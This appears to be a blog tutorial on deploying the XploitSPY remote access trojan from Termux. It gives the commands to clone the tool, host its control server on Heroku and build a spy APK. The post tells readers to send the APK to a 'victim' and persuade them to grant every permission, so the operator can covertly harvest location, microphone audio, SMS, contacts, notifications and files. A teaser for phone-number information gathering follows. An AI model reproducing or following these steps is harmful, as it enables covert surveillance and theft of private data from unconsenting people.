Skip to main content

How to create a spy app using rat network in termux android

 Creating a spy app using termux in android




In this blooger we are going learn about how to create a spy phone app using rat network in termux android.......

how to use xploitspy in termux Hi guys' if you are searching for how to use xploitspy in termux and searching for the best article to get the best explanation about how to use xploitspy in termux. Then you are at the right place.

Today I'm here going to share the step by step tutorial about "how to use exploitspy in termux". By this article, you can get a lot of about how to hack android phone by sending a link, how to hack your mobile data,. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.

You can watch full video tutorial in my channel tech hack telugu link:-Click here to watch video tutorial



How to use xploitspy in termux

Hello, guy's I am back with another amazing post so in this post let's learn how to use xploitspy RAT to hack any android device without root from termux. So let's get started.

Feature's of xploitspy tool >>>
  • GPS Logging
  • Microphone Recording
  • View Contacts
  • SMS Logs
  • Send SMS
  • Call Logs
  • View Installed Apps
  • View Stub Permissions
  • Live Clipboard Logging
  • Live Notification Logging (WhatsApp, Facebook, Instagram, Gmail and more ....)
  • View WiFi Networks (logs previously seen)
  • File Explorer & Downloader
  • Command Queuing
  • Built-In APK Builder






Follow below step's

1. Install termux and update and upgrade it

2. Now, exit from termux, after that open your web browser and create an account in Heroku
(Heroku is an online server that helps to monitor our RAT activity without any issue, so we have to use this as a tunnel.) https://heroku.com after signup login in and click on create a new app and give it a good name which you can remember in further process and after that app will be created in the Heroku server.

ex:- I created an app and its name is techhackrat

3. Now, come back to termux and execute the below commands one by one.

$ pkg install git -y

$ termux-setup-storage

$ ls


$ git  clone -b 
herooku https://github.com/XploitWizer/XploitSPY

cd XploitSPY

$ ls

$ pkg install nodejs

$ npm install heroku -g

$ heroku login -i

(Here a pop-up will appear and asks for permission to open a browser to login in into heroku0 just press enter in the keyboard and the browser opens and the login will be successful)

heroku git:remote -a (your appName here)

ex:- heroku git:remote -a techhackrat

heroku buildpacks:add heroku/jvm

heroku buildpacks:add heroku/nodejs

git push heroku herooku:master

Now, all the process has been successfully completed now the app creating process will be started in terminal of termux so wait for it after the completion of that a link will appear in your terminal like below example.

ex:- https://techhackrat.herokuapp.com

Now, copy-paste that shown link in your terminal and paste it in your browser and xploitspy tool page will be opened after that it asks for username and password
usernames are admin and password is password.

After logging in successfully now turn on the desktop mode in your browser after that a new button will appear in xploitspy websites that is APK builder now click on it and after the app created it asks to download and now download it and send it to your victim and tell him to allow all the permissions app then your rat will start working fine. 

To access hacked devices just log in every time in xploitspy web and click on devices and after that, you can see the available devices and to get data from it click on manage and after that, you can get whatever data you need from your victim's device.




Send that app to victims and install it in their mobiles....... that's it you can see all the information in your victims phone very easy process

Comments

Post a Comment

Popular posts from this blog

How to gather information of a mobile number in android using phoneinfoga in termux

Information gathering from phone number android in termux no root. + B efore getting started,there is a disclaimer of you ... *We are not responsible for any thing which is done by you this is only for educational purposes.......so please don't misuse the content given to you Hacking is illegal so please be careful....,.   To watch video tutorial click here Let's  see the steps follow all steps as shown don't do any mistake.... Type or copy commands from this page and paste in termux...... apt update pkg upgrade pkg install git After using command pkg install git it will ask you Like this.... Do you want to continue? [Y/n] Type Y and click enter git clone https://github.com/sundowndev/PhoneInfoga Make sure that git clone and link are in the same line here I have them in two lines ok... pkg install python3 pkg install python ls cd PhoneInfoga mv config.example.py config .py ls pyt...